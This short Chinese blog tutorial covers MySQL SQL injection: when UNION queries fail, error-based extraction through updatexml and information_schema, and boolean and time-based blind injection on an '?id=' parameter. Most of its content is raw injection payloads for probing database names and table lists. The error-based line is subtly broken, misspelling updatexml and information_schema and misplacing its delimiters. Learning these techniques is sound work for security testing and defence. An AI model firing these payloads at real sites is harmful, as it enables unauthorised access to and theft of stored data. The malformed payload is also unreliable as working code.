4.SQL注入-错误注入与盲注
2022/8/1 2:23:14
本文主要是介绍4.SQL注入-错误注入与盲注,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
一.Union查询注入不使用的地方
1.注入语句无法截断,且不清楚完整的SQL查询语句;
2.页面不能返回查询信息的时候;
3.Web页面中有两个SQL查询语句,查询语句的列数不同;
二.关于MySQL处理XML
1.先准备以下XML内容
?id=1 and updataxml(1,concat(0x7e,(select group_concat(table_name) from information_schma.tables,0x7e),1)
三.盲注
没有回显的时候
1.Boolean型注入
?id=1 and length(database())=5 ?id=1 and (select substr(database(),1,1)='l')
2.时间型注入
?id=1 and if(length(database())=5,sleep(2),1);
?id=1 and if((select substr(database(),1,1)='l'),sleep(2),1);
这篇关于4.SQL注入-错误注入与盲注的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-23Java对接阿里云智能语音服务入门教程
- 2024-11-23JAVA对接阿里云智能语音服务入门教程
- 2024-11-23Java副业入门:初学者的简单教程
- 2024-11-23JAVA副业入门:初学者的实战指南
- 2024-11-23JAVA项目部署入门:新手必读指南
- 2024-11-23Java项目部署入门:新手必看指南
- 2024-11-23Java项目部署入门:新手必读指南
- 2024-11-23Java项目开发入门:新手必读指南
- 2024-11-23JAVA项目开发入门:从零开始的实用教程
- 2024-11-23Java项目开发入门:新手必读指南